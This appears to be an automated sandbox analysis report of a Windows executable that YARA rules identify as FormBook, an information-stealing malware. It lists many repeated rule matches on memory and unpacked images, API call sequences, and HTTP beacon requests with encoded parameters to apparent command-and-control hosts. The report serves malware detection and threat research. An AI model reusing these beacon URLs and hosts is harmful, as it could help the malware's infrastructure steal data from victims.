          Source: unknownDNS traffic detected: queries for: www.yr-golf.com
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1Host: www.yr-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1Host: www.assisttm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1Host: www.fastbest.hostConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Y1p8VPvyU2.exe, 00000000.00000002.305416904.00000000006FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Y1p8VPvyU2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00406043
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00404618
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040681A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000E44F
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000E867
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000EC9C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000F0D1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100170E6
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100191A3
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021DE2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021DF1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10017E00
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1001424E
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10017658
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_1000DF5B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10016B74
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00401175
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041C997
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041BB46
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041CBF5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00408C3A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00408C80
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041C48C
